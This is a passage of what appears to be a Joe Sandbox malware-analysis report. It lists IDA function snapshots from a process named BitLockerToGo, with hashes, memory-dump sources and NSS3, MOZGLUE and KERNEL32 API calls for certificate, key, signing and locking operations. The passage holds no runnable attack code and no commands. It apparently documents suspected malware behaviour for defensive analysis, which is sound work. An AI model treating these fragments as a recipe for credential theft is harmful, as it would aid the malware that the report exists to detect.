                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: da6ebd017df34267e2bfa4b42f4e147729979cb5e3ddd3298694ed5b3161a814
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f56aebbac28e28117ed72b20332d194c5a7e274430846a28ccedee9f0b112d7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6ebd017df34267e2bfa4b42f4e147729979cb5e3ddd3298694ed5b3161a814
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C24107B1904310A7E7214A589C85BEF32A8AF4271CF500625F814A6F42F735DA6BC7DF
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709890: TlsGetValue.KERNEL32(?,?,?,6C7097EB), ref: 6C70989E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75AF88
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C75AFCE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C75AFD9
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75AFEF
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C75B00F
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B02F
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B070
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B07B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B084
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75B09B
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B0C4
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B0F3
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B0FC
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B137
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B140
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 235599594-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 42b899ac6eed09f02cbba64a8d81cd3622185f722418a41ca6ecdc544f5e4a0c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 489289e8b0f8f06f590a7f7b6df7043f7d1556bc592d1d6e060419fd135b80c3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42b899ac6eed09f02cbba64a8d81cd3622185f722418a41ca6ecdc544f5e4a0c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 129180B5A00601CFCB00DF15C988856BBF1FF4935876985B9D8195BB22EB32FC56CB91
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2BF0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C07
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: free.MOZGLUE(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C4A
• free.MOZGLUE(?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D0F
• free.MOZGLUE(?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D4E
• free.MOZGLUE(?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D62
• free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D85
• free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D99
• free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5DFA
• SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5E33
• SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E3E
• free.MOZGLUE(?,?,?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E47
• free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5E60
• SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E78
• free.MOZGLUE(?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5EB9
• free.MOZGLUE(?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5EF0
• SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5F3D
• SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5F4B
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
• String ID:
• API String ID: 4273776295-0
• Opcode ID: e3bbdd5d4afcd2f20dcd87e22be82854ba1acbdde26f5f110bd42b124c052dcf
• Instruction ID: f0c530ceda4be8c275462dfb0cafbb63e2219437ea480785f3ae7fe6e786a162
• Opcode Fuzzy Hash: e3bbdd5d4afcd2f20dcd87e22be82854ba1acbdde26f5f110bd42b124c052dcf
• Instruction Fuzzy Hash: 9E71A1B5A00B019FD700DF24D884A92B7F5FF8A308F158529E85E87B11EB31F965CB99
APIs
• TlsGetValue.KERNEL32(?,?), ref: 6C658E22
• EnterCriticalSection.KERNEL32(?), ref: 6C658E36
• memset.VCRUNTIME140(?,00000000,?), ref: 6C658E4F
• calloc.MOZGLUE(00000001,?,?,?), ref: 6C658E78
• memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C658E9B
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6C658EAC
• PL_ArenaAllocate.NSS3(?,?), ref: 6C658EDE
• memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C658EF0
• memset.VCRUNTIME140(?,00000000,?), ref: 6C658F00
• free.MOZGLUE(?), ref: 6C658F0E
• memcpy.VCRUNTIME140(?,?,?), ref: 6C658F39
• memset.VCRUNTIME140(?,00000000,?), ref: 6C658F4A
• memset.VCRUNTIME140(?,00000000,?), ref: 6C658F5B
• PR_Unlock.NSS3(?), ref: 6C658F72
• PR_Unlock.NSS3(?), ref: 6C658F82
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
• String ID:
• API String ID: 1569127702-0
• Opcode ID: 6754fcd0451570591f371d5e6bb4fd255c1678c6a0ed19bd4d33b8d56e8e31bd
• Instruction ID: 5ba3835e75a7633ed1b860c5f81eeffaed150afcb17d7aff7620ef59ed9a6114
• Opcode Fuzzy Hash: 6754fcd0451570591f371d5e6bb4fd255c1678c6a0ed19bd4d33b8d56e8e31bd
• Instruction Fuzzy Hash: 18513BB2E402059FD7009F68CC849AEB7B9EF49358F64452AEC089BB10EB31ED55C7D5
APIs
• PR_Lock.NSS3(?), ref: 6C751000
  • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
  • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
• PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C751016
  • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
• PR_Unlock.NSS3(?), ref: 6C751021
  • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
  • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
• PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C751046
• PR_Unlock.NSS3(?), ref: 6C75106B
• PR_Lock.NSS3 ref: 6C751079
• PR_Unlock.NSS3 ref: 6C751096
• free.MOZGLUE(?), ref: 6C7510A7
• free.MOZGLUE(?), ref: 6C7510B4
• PR_DestroyCondVar.NSS3(?), ref: 6C7510BF
• PR_DestroyCondVar.NSS3(?), ref: 6C7510CA
• PR_DestroyCondVar.NSS3(?), ref: 6C7510D5
• PR_DestroyCondVar.NSS3(?), ref: 6C7510E0
• PR_DestroyLock.NSS3(?), ref: 6C7510EB
• free.MOZGLUE(?), ref: 6C751105
Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 8544004-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8507fd271b796175c10bc6e876b391ad202e217f06ca77d391836a0360a288d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c53376cfbfcd6193ff08378087c7101b9c8c57c76271a0c7d020addfe1091ae6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8507fd271b796175c10bc6e876b391ad202e217f06ca77d391836a0360a288d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17318DB5900401BBEB02AF14FE45A45BBB1FF46359B584131E80942F61EB32F978DBDA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5CDD56
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C5CDD7C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C5CDE67
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C5CDEC4
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CDECD
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2945245e453c5edce6112df78d99959bf9d8709a27eea43585604623e5f01394
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 61e79e1490e3ae978b67956d17ef30259aa819753393794c704413b259f0282a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2945245e453c5edce6112df78d99959bf9d8709a27eea43585604623e5f01394
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DA1D071B442059FC710DF69CC80A6AB7F5AF85308F19892DE889CBB51E734E945CBA2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C68EE0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C68EEE1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C681D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: EnterCriticalSection.KERNEL32(?), ref: 6C681D8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681D50: PR_Unlock.NSS3(?), ref: 6C681DD3
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68EE51
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C68EE65
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68EEA2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EEBB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68EED0
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68EF48
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EF68
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68EF7D
                                                                                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C68EFA4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68EFDA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C68F055
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C68F060
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91d32b3410c6bb3ce8cfecedbd24afed756415c373c771cd806383cc5b6205af
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 788e81fc783ec32c60463a23ce0ffba029711f1eedda6f2ab764710beb8283b5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91d32b3410c6bb3ce8cfecedbd24afed756415c373c771cd806383cc5b6205af
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F818EB5A01209AFDF00DFA5DC85ADE7BB5BF49308F140024E919A7711E731E925CBB9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C654D80
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C654D95
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C654DF2
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C654E2C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C654E43
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C654E58
                                                                                                                                                                                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C654E85
                                                                                                                                                                                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C7A05A4,00000000), ref: 6C654EA7
                                                                                                                                                                                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C654F17
                                                                                                                                                                                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C654F45
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C654F62
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C654F7A
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C654F89
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C654FC8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 141480161fc60a8c28cdafb3375c75c9d6ef24462f067864c94568a494f44d8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c4241de18bbeb09ab33c6a3ce3631ce252137b77dc86844433d24581bb7a420f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 141480161fc60a8c28cdafb3375c75c9d6ef24462f067864c94568a494f44d8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA81D4716083019FE701CF28D840BABB7E4AFC5308F64856DF959DB640E771E925CB9A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C695C9B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C695CF4
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C695CFD
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C695D42
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C695D4E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C695D78
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C695E18
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C695E5E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C695E72
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C695E8B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C68F854
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C68F868
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C68F882
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(04C483FF,?,?), ref: 6C68F889
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C68F8A4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C68F8AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C68F8C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68F820: free.MOZGLUE(280F10EC,?,?), ref: 6C68F8D0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9c8c8ee9ce2c0d61dcfaaab5b9668b47771eebebc4970a862a03f0d1025ac868
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a7e8581d6baf3e5b0f56170ef5e437a2fa496f82cda2e2cb9d5d4177ce144252
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c8c8ee9ce2c0d61dcfaaab5b9668b47771eebebc4970a862a03f0d1025ac868
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F371F8F0A051069BEB009F25ED4576E3375AF4531EF140135EC099AB52EB32E91AC79E
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6C689582), ref: 6C688F5B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C688F6A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
